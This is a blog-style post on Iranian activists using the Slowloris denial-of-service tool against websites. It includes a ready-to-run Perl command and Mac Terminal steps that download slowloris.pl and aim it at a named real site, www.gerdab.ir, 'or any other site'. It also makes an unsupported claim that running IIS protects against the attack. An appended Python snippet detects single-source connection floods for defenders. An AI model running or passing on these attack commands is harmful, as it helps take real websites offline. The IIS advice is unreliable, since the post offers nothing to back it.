The Iranian cyberwar soldiers have a problem. They can't use a general DDoS, even against a specific site, because that would hamper the opposition, who have to get their material out at all times. It is the only way information can be distributed fast enough. So luckily (act of God? :)) Slowloris came along. This makes it possible to DDoS a site without even using more connections than a normal website visit. But the code has been open-sourced and, as the hackers said, could be made much better.
Well, you shouldn't have told that to the Iranians, among whom there are many geeks and computer code freaks (and very intelligent ones, by the way :)). As they are now knocked off the streets and silenced in the media, they can only wage their opposition online while waiting for the next opportunity to make their opposition and views known.
Meanwhile, for us as security administrators, it is a bit disconcerting to see crappy code being developed into very forceful attack code that could be used by anyone against anything for any reason, and against which there is until now not much you can do.
Yes, there is one thing: be sure to have a version of your website on IIS as a backup in case your site is attacked and knocked out. It is a design failure of Sun, Squid, Apache and a bunch of others that isn't present in IIS. Do take the latest versions of IIS and Windows 2008, though, deactivate WebDAV, and use the security tools from Microsoft to secure and lock down your site. Do not think you are smarter than Microsoft by opening up stuff or activating things you probably don't need.
You have to follow our Diigo links on our dashboard to find the references to that new attack code, which you can't stop for the moment with anti-DDoS protection and which bypasses the existing protection modules for Apache.
For the moment it is becoming as simple as this (with the Perl version installed):
> perl slowloris.pl -dns WEBSITE -port 80 -timeout 626 -num 2000 -tcpto 5 -httpready
And there goes your website, under the load of one machine on one ADSL line, if you are running Apache.
And for Mac (yes, it is Perl, so it runs on any machine):
"To run slowloris.pl on Mac OS X, open Terminal and type this (hit return at the end of each line):
mkdir -p ~/Source && cd ~/Source/
curl -O http://ha.ckers.org/slowloris/slowloris.pl
chmod +x slowloris.pl
./slowloris.pl --dns www.gerdab.ir" or any other site
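For the administrator on the receiving end, the single-machine pattern in the first command (one source, `-num 2000` sockets) shows up in the web server's connection table. The following is an added example, not part of the original post: it reads Linux `netstat -tn` style output and flags sources holding many established connections to port 80. The sample data, the helper names and the threshold of 100 are assumptions.

```python
from collections import Counter

# Constructed sample in the layout of Linux `netstat -tn` output.
SAMPLE = """\
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 192.0.2.10:80           203.0.113.5:40112       ESTABLISHED
tcp        0      0 192.0.2.10:80           203.0.113.9:51544       TIME_WAIT
tcp        0      0 192.0.2.10:22           203.0.113.5:40990       ESTABLISHED
tcp6       0      0 2001:db8::10:80         2001:db8::99:41000      ESTABLISHED
"""


def split_hostport(addr):
    """Split 'host:port' on the last colon so IPv6 hosts stay intact."""
    host, _, port = addr.rpartition(":")
    return host, port


def established_per_source(netstat_text, port="80"):
    """Count ESTABLISHED connections to the local port, per remote address."""
    counts = Counter()
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or not fields[0].startswith("tcp"):
            continue  # header line or a non-TCP row
        _, local_port = split_hostport(fields[3])
        remote_host, _ = split_hostport(fields[4])
        if local_port == port and fields[5] == "ESTABLISHED":
            counts[remote_host] += 1
    return counts


def flag_sources(netstat_text, port="80", threshold=100):
    """Return (address, count) pairs at or above the assumed threshold."""
    counts = established_per_source(netstat_text, port)
    return sorted((ip, n) for ip, n in counts.items() if n >= threshold)


def build_sample(extra=150):
    """SAMPLE plus `extra` constructed connections from a single source."""
    rows = [f"tcp 0 0 192.0.2.10:80 198.51.100.7:{30000 + i} ESTABLISHED\n"
            for i in range(extra)]
    return SAMPLE + "".join(rows)


if __name__ == "__main__":
    for ip, n in flag_sources(build_sample()):
        print(f"{ip} holds {n} established connections to port 80")
```

A per-source count like this only catches the one-machine case the post describes; the same traffic spread over many sources stays under any per-address threshold.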